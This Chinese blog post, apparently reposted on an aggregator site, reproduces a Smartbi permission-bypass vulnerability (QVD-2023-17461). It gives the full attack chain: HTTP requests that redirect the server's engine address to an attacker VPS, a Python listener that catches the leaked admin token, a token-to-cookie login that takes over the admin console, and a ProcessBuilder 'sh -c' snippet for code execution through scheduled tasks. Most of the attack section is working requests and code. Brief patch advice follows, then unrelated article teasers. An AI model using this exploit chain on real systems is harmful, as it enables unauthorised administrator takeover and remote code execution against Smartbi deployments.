Smartbi 权限绕过漏洞复现(QVD-2023-17461)

news2024/9/28 21:30:28

0x01 产品简介

   Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。

0x02 漏洞概述

    Smartbi在特定情况下可被获取用户token,未经授权的攻击者可通过这种方式获取管理员权限,从而以管理员权限接管后台,进一步利用可实现任意代码执行。利用此漏洞需目标可出网。  

0x03 影响范围

  V6 <= Smartbi <= V10

0x04 复现环境

FOFA:app="SMARTBI"

c9043c3d0bdc4b84888755d49baca9e3.png

0x05 漏洞复现

 更新内部引擎地址

POST /smartbi/smartbix/api/monitor/setEngineAddress HTTP/1.1
Host: your-ip
Content-Type: application/json

http://vpsip:8000

6b9b1d116b294f56a943a172979fbc70.png

 PS:有的环境url不一样,区别在于有没有多一层“/smartbi” 目录,自行根据实际环境测试,如下

f379e7c7ce0245f2a4733423f140ed51.png

56df95d82deb4aae91342eda69287fff.png 验证地址更新的情况 

POST /smartbi/smartbix/api/monitor/engineInfo HTTP/1.1
Host: your-ip
Content-Type: application/json

c9aa86edc7334a5ba8dcffa9b6bfb724.png

 发送管理员token到vps(不能使用nc监听,由于nc监听或者返回的值不是json格式,导致报错,获取的token没被存入对应的变量中,无法进行绕过,所以需要手动编写⼀个http服务,用于监听返回的数据为任意json格式)

脚本:

import json
from http.server import BaseHTTPRequestHandler, HTTPServer

class RequestHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length).decode('utf-8')
        print(f'Received data: {post_data}')

        # 解析post_data,并构建要返回的JSON数据
        data = json.loads(post_data)
        response = {'message': 'Data received successfully'}

        # 设置响应头和状态码
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()

        # 将JSON数据转换为字节流并发送回客户端
        self.wfile.write(json.dumps(response).encode('utf-8'))

def run_server():
    server_address = ('', 8000)
    httpd = HTTPServer(server_address, RequestHandler)
    print('Server is running...')
    httpd.serve_forever()

if __name__ == '__main__':
    run_server()

原理:使用http.server模块来创建一个基于HTTP协议的服务器。它监听本地的8000端口,并在收到POST请求时,将请求体中的数据解析为JSON格式。然后构建一个包含成功消息的JSON响应,并将其发送回客户端。

开启监听,发送token

54ae89e31c954a10b567fb9284848e0b.png

POST /smartbi/smartbix/api/monitor/token HTTP/1.1
Host: your-ip
Content-Type: application/json

experiment

6c5903aa9b0640acb72ba205f4a6df07.png

 8fe20ec1313e4ac3b60162db02d0e70c.png

利用管理员token 获取登录后的cookie

POST /smartbi/smartbix/api/monitor/login HTTP/1.1
Host: your-ip
Content-Type: application/json

获取到的管理员token

59af1c5d06c3423b9554ff7d4d8c418a.png PS:必须是true,false不管用

替换cookie接管后台

c324629913d14b599e845733b3208ccf.png

替换完刷新页面即可 

ac0f08a7d6d94c439889effb82b92b89.png

 后利用思路:计划任务RCE

importPackage(Packages.java.lang);
importPackage(Packages.java.io);
importPackage(Packages.smartbi.repository);
importPackage(Packages.smartbi.util);
importPackage(Packages.java.util);

builder = new ProcessBuilder();
builder.command("sh", "-c", "执行的命令");
builder.directory(new File(System.getProperty("user.home")));
process = builder.start();

0x06 修复建议

临时缓解方案

通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

升级修复方案

目前官方已发布补丁,建议受影响用户尽快更新至 2023-07-28 安全补丁包:

https://www.smartbi.com.cn/patchinfo

  

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/853201.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

odoo-033 比较 float 浮点数大小之精度坑

odoo-033 比较 float 浮点数大小之精度坑

文章目录 前提原因问题 前提 产品单位精确到6位小数生产制造模块&#xff0c;重写了完成的方法&#xff0c;在点击完成的时候报错如下&#xff1a; &#xff08;解释下&#xff1a;就是很奇怪&#xff0c;明明都是必填字段&#xff0c;也都赋值了但是就是拿不到值&#xff09;…
阅读更多...
2.若依前后端分离版第一个增删查改

2.若依前后端分离版第一个增删查改

1.介绍 若依提供了代码生成功能&#xff0c;单表的CRUD可以直接用若依框架提供的代码生成进行创建。 2.实现 2.1 在数据库创建业务表test_teacher 2.2 生成代码 运行系统&#xff0c;进入菜单[系统工具]-》[代码生成],点击导入按钮&#xff0c;选择需要生成代码的表进行导…
阅读更多...
Redis储存结构

Redis储存结构

Redis怎么储存的 这个redisDb是数据库对象 里面的其他字段忽略了 然后里面有个dict列表(字典列表) 我们随便来看一个redisObject 区分一下子啊 他这个dict里面没有存redisObject的对象 也没有存dict对象 它只是存了个数据指针 你看那个redis每个底层编码 抠搜的 这块要是再保存…
阅读更多...
信道复用技术

信道复用技术

信道划分介质访问控制将使用介质的每个设备与来自同一通信信道上的其他设备的通信隔离开来&#xff0c;把时域和频域资源合理地分配给网络上的设备 多路复用&#xff1a;就是将多个信号组合在一条物理信道上进行传输&#xff0c;使多个计算机或终端设备共享信道资源&#xff0c…
阅读更多...
分班查询系统学生信息在线采集方法和具体操作教程

分班查询系统学生信息在线采集方法和具体操作教程

作为教师&#xff0c;特别是临近新学年&#xff0c;我们经常需要进行学生分班工作&#xff0c;这是一项繁琐但非常重要的工作。为了提高工作效率&#xff0c;我们可以利用易查分轻松生成一个学生分班查询系统。本文将介绍如何利用易查分设计和开发这样一个系统。 我们可以选择使…
阅读更多...
vue+element 下载压缩包和导出

vue+element 下载压缩包和导出

export function goodsInspectionReportDwnloadZip (params) {return axios({url: "/warehouse-entry-server/v1/goodsInspectionReport/downloadZip",method: "get",params,responseType: "blob"}) } //下载handleDownloadFile() {if (!this.$r…
阅读更多...
【LeetCode】删除并获得点数

【LeetCode】删除并获得点数

删除并获得点数 题目描述算法分析编程代码空间优化 链接: 删除并获得点数 题目描述 算法分析 编程代码 class Solution { public:int deleteAndEarn(vector<int>& nums) {const int N 10001;int arr[N] {0};for(const auto& n : nums){arr[n]n;}vector<in…
阅读更多...
小红书数据分析丨现实版模拟人生,这届网友热衷于“云开店”?

小红书数据分析丨现实版模拟人生,这届网友热衷于“云开店”?

近期&#xff0c;小红书出现的一个神秘的热心群体&#xff0c;他们经常活跃在各种小店店主发布的求助帖评论区中&#xff0c;积极地帮助店主出谋划策&#xff0c;寻找小店经营的优化之道&#xff0c;成功帮助小店成功转亏为盈&#xff01;江湖人称一一云股东。小红书话题#爱上帮…
阅读更多...
微信小程序启动自动检测版本更新,检测到新版本则提示更新

微信小程序启动自动检测版本更新,检测到新版本则提示更新

UpdateManager 对象&#xff0c;用来管理更新&#xff0c;可通过 wx.getUpdateManager 接口获取实例 在app.js中的示例代码 onShow() {// 获取小程序更新机制的兼容&#xff0c;由于更新的功能基础库要1.9.90以上版本才支持&#xff0c;所以此处要做低版本的兼容处理if (wx.c…
阅读更多...
java serialport 串口助手源码 RXTX java 11还崩溃。java串口支持jdk11,jdk13,jdk14版本win10 64位系统bug修复库nrjavaserial好用

java serialport 串口助手源码 RXTX java 11还崩溃。java串口支持jdk11,jdk13,jdk14版本win10 64位系统bug修复库nrjavaserial好用

Java提供了一些API来支持串口通信。主要包括&#xff1a; javax.comm&#xff1a;Java Communications API&#xff0c;是一个用于串行通信的Java API。然而&#xff0c;这个API已经很长时间没有更新了&#xff0c;而且只支持32位的Windows系统。官网已经删。 RXTX&#xff1a;…
阅读更多...
成功解决Linux下中文乱码问题,CentOS7设置系统字符编码

成功解决Linux下中文乱码问题,CentOS7设置系统字符编码

在linux中&#xff0c;可以使用以下命令查看当前系统的字符编码&#xff1a; echo $LANG 如果不是UTF-8&#xff0c;就会出现中文乱码现象! 解决办法&#xff1a;设置字符编码环境变量为utf-8 1. 打开 ~/.bashrc 或 ~/.bash_profile 文件 vi ~/.bashrc 或 vi ~/.bash_prof…
阅读更多...
北航基于openEuler构建工业机器人操作系统,打造“开箱即用”的机器人基础软件平台

北航基于openEuler构建工业机器人操作系统,打造“开箱即用”的机器人基础软件平台

北京航空航天大学是国家“双一流”建设高校&#xff0c;以建设扎根中国大地的世界一流大学为发展目标。北京航空航天大学在机器人领域一直处于行业前沿&#xff0c;以其亮眼的成果和优秀的师资力量&#xff0c;成为国内机器人领域的重要参与者和建设者。机器人操作系统是机器人…
阅读更多...
根证书和中间证书有什么区别?

根证书和中间证书有什么区别?

通常即使是获取了SSL证书的人&#xff0c;也只知道他们需要SSL证书&#xff0c;而且他们必须在服务器上安装SSL证书&#xff0c;才能通过HTTPS为网站提供服务。当进一步提到中间证书、根证书时&#xff0c;大多数人都感到陌生。本文小编就将为您介绍根证书与中间证书的定义以及…
阅读更多...
怎么采集网址、图片地址等标签属性

怎么采集网址、图片地址等标签属性

如果只想采集网址、图片地址等HTML标签属性的值&#xff0c;要怎么采集呢&#xff1f; 可以使用简数采集器&#xff0c;有对应的快捷提取方式&#xff0c;一键即可转换为采集网址、采集图片地址方式&#xff0c;非常方便快捷。 也可以自行设置高级提取&#xff0c;提取Html标…
阅读更多...
vite跨域配置踩坑,postman链接后端接口正常,但是前端就是不能正常访问

vite跨域配置踩坑,postman链接后端接口正常,但是前端就是不能正常访问

问题一&#xff1a;怎么都链接不了后端地址 根据以下配置&#xff0c;发现怎么都链接不了后端地址&#xff0c;proxy对了呀。 仔细看&#xff0c;才发现host有问题 // 本地运行配置&#xff0c;及反向代理配置server: {host: 0,0,0,0,port: 80,// cors: true, // 默认启用并允…
阅读更多...
进程通信常见方式

进程通信常见方式

目录 通信通信概述 通信的主要方式 进程同步机制--低级进程通信 高级通信工具 共享存储器系统(Shared-Memory System&#xff09; 管道(pipe)通信系统 客户机-服务器系统(Client-Server system)---套接字&#xff08;Socket&#xff09; 客户机-服务器系统(Client-Serv…
阅读更多...
数字孪生技术的实用性究竟有多高?

数字孪生技术的实用性究竟有多高?

数字孪生是将实际物理世界与数字虚拟世界相结合的创新方法&#xff0c;它为我们提供了一个全新的视角&#xff0c;带来了许多令人兴奋的前景。那么&#xff0c;数字孪生的实用性究竟有多高呢&#xff1f; 首先&#xff0c;数字孪生在工业领域展现出了巨大的实用潜力。通过在虚…
阅读更多...
Oracle-创建PDB

Oracle-创建PDB

Oracle-创建PDB 创建PDB的方式 从PDB$SEED新建PDB克隆已存在的PDB 本地PDB克隆到同一个CDB中将远程PDB克隆到CDB中将非CDB插入或克隆到CDB中通过插拔的方式创建PDB sql 命令语法 条件 CDB必须open并且read write模式连接CDB$ROOT 用户并且具有CREATEPLUGGABLEDATABASE系统权…
阅读更多...
树状结构数据,筛选指定数据

树状结构数据,筛选指定数据

问题描述&#xff1a; 应用场景和需求&#xff1a;对一个树状结构的数据&#xff0c;进行CRUD 时&#xff0c;想筛选出 树状结构数据中存在变动的部分。 操作步骤 准备需要的数据&#xff1a; 1.先拿到 你原来的树状结构数据 2.再筛选出 需要保留的数据集合id&#xff0c;也…
阅读更多...
机器学习基础之《特征工程(4)—特征降维》

机器学习基础之《特征工程(4)—特征降维》

一、什么是特征降维 降维是指在某些限定条件下&#xff0c;降低随机变量&#xff08;特征&#xff09;个数&#xff0c;得到一组“不相关”主变量的过程 1、降维 降低维度 ndarry 维数&#xff1a;嵌套的层数 0维&#xff1a;标量&#xff0c;具体的数0 1 2 3... …
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023